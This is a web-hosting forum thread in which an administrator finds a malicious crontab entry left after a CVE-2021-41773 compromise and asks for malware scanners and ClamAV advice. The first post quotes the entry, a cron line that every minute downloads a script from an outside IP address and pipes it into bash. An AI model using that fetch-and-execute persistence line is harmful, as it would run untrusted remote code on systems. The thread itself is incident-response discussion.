Server hit by CVE-2021-41773

Operating System & Version
CentOS 7
cPanel & WHM Version
11.98.0

mvandemar

Well-Known Member
Jun 17, 2006
133
30
178
I was scanning all of my clients' servers for suspicious crontab entries as described in this article:


All came back clean aside from 1:

Code:
# cat /var/spool/cron/myuser
* * * * * wget -q -O - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1
The server has been running Apache/2.4.51 since Oct 28th so I know the original vulnerability no longer exists, but the script referenced in the crontab is no longer accessible so I have no idea what it did, or what other backdoors may have been created and accessed since this event. I did see that ip address and the script referenced in this article, indicating it was probably/possibly a cryptominer that was dropped, but I don't know how to tell for certain:


Do you guys have any recommendations for scanners to see what else may have happened? Are there built in scanners in cpanel aside from clamav? Has anyone tried Lynis, or know anything about them?


Any other recommendations?

Thanks.

-Michael
 

cPanelAnthony

Administrator
Staff member
Oct 18, 2021
583
54
103
Houston, TX
cPanel Access Level
Root Administrator
Hello! You might want to try Imunify. Other than that, it might be worth reaching out to your sysadmin or web hosting provider for advice.

 

mvandemar

Well-Known Member
Jun 17, 2006
133
30
178
  • Like
Reactions: cPanelAnthony

mvandemar

Well-Known Member
Jun 17, 2006
133
30
178
I installed clamav from the WHM dashboard, and when I went to run it I got the following message:

Code:
# /usr/local/cpanel/3rdparty/bin/freshclam
ClamAV update process started at Mon Nov 22 17:47:24 2021
WARNING: Your ClamAV installation is OUTDATED!
WARNING: Local version: 0.101.5 Recommended version: 0.103.4
DON'T PANIC! Read https://www.clamav.net/documents/upgrading-clamav
main.cvd is up to date (version: 62, sigs: 6647427, f-level: 90, builder: sigmgr)
daily.cvd is up to date (version: 26361, sigs: 1947102, f-level: 90, builder: raynman)
bytecode.cld is up to date (version: 333, sigs: 92, f-level: 63, builder: awillia2)
Is there a reason that cpanel would be installing an older version? Is this a copy meant specially for cpanel, or is it safe to update it to the latest?

Thanks.

Edit: when I look in yum it does show the newest version, but it doesn't think clamav is even installed, so it does appear to be specific to the cpanel plugin version of clamav. Any idea why that would be out of date? I don't see a way to update it in cpanel, it just shows that it uses the older version.

Edit #2: Are there any issues with running OSSEC+ on a cpanel machine? Does anyone have any experience with this? Thanks.

-Michael
 
Last edited: